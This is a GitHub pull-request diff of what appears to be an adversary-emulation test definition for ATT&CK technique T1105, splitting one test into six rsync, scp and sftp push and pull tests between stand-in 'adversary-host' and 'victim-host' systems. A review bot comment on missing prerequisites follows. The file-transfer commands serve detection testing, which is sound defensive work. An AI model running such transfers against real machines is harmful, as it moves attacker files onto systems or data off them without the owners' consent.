Merge pull request #390 from ForensicITGuy/t1105-fix

Fixed T1105 test
This commit is contained in:
Keith McCammon
2018-11-10 15:24:25 -07:00
committed by GitHub
+155 -30
@@ -3,45 +3,170 @@ attack_technique: T1105
display_name: Remote File Copy
atomic_tests:
- name: rsync - scp - sftp remote file copy
- name: rsync remote file copy (push)
description: |
Utilize rsync, scp and sftp to perform a remote file copy
Utilize rsync to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
local_path:
description: Path of folder to copy
type: Path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: String
default: victim
remote_host:
description: Remote host to copy toward
type: String
default: victim-host
remote_path:
description: Remote path to receive rsync
type: Path
default: /tmp/victim-files
executor:
name: bash
command: |
### FIX: Not sure how to handle commands that need to be run on multiple systems
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
- name: rsync remote file copy (pull)
description: |
Utilize rsync to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_path:
description: Path of folder to copy
type: Path
default: /tmp/adversary-rsync/
username:
description: User account to authenticate on remote host
type: String
default: adversary
remote_host:
description: Remote host to copy from
type: String
default: adversary-host
local_path:
description: Local path to receive rsync
type: Path
default: /tmp/victim-files
executor:
name: bash
command: |
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
# Victim System Configuration
# Ensure SSH access has been configured for a victim account
# Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
- name: scp remote file copy (push)
description: |
Utilize scp to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
local_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: String
default: victim
remote_host:
description: Remote host to copy toward
type: String
default: victim-host
remote_path:
description: Remote path to receive scp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
# Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
- name: scp remote file copy (pull)
description: |
Utilize scp to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-scp
username:
description: User account to authenticate on remote host
type: String
default: adversary
remote_host:
description: Remote host to copy from
type: String
default: adversary-host
local_path:
description: Local path to receive scp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
# Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
- name: sftp remote file copy (push)
description: |
Utilize sftp to perform a remote file copy (push)
supported_platforms:
- linux
- macos
input_arguments:
local_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: String
default: victim
remote_host:
description: Remote host to copy toward
type: String
default: victim-host
remote_path:
description: Remote path to receive sftp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
# Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
# Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
# Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
- name: sftp remote file copy (pull)
description: |
Utilize sftp to perform a remote file copy (pull)
supported_platforms:
- linux
- macos
input_arguments:
remote_file:
description: Path of file to copy
type: Path
default: /tmp/adversary-sftp
username:
description: User account to authenticate on remote host
type: String
default: adversary
remote_host:
description: Remote host to copy from
type: String
default: adversary-host
local_path:
description: Local path to receive sftp
type: Path
default: /tmp/victim-files/
executor:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
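Review bot: None of the six new tests states its prerequisites, although the setup the removed block carried as comments (SSH access for the named account, an existing source file or directory such as `/tmp/adversary-scp` or `/tmp/adversary-rsync/`, and a writable destination such as `/tmp/victim-files`) is still required by every `command:` here, so a run with the defaults fails at the transfer instead of telling the operator what to prepare; the same applies to the rsync push, rsync pull, scp push, scp pull and sftp push tests. I would extend each `description` with a line like `Requires SSH access to #{remote_host} as #{username}; the source path must already exist on the executing host and the destination path must be writable on the receiving host.`, adjusting the argument names per test. The `### FIX: Not sure how to handle commands that need to be run on multiple systems` line sits inside the rsync push `command: |` literal, so if it is on the new side it is shipped as part of the executed script and should move to the description or be dropped. The sftp push also depends on the bash-only `<<<` here-string, which is fine with `name: bash` but worth a short comment in the description so nobody switches the executor to `sh`.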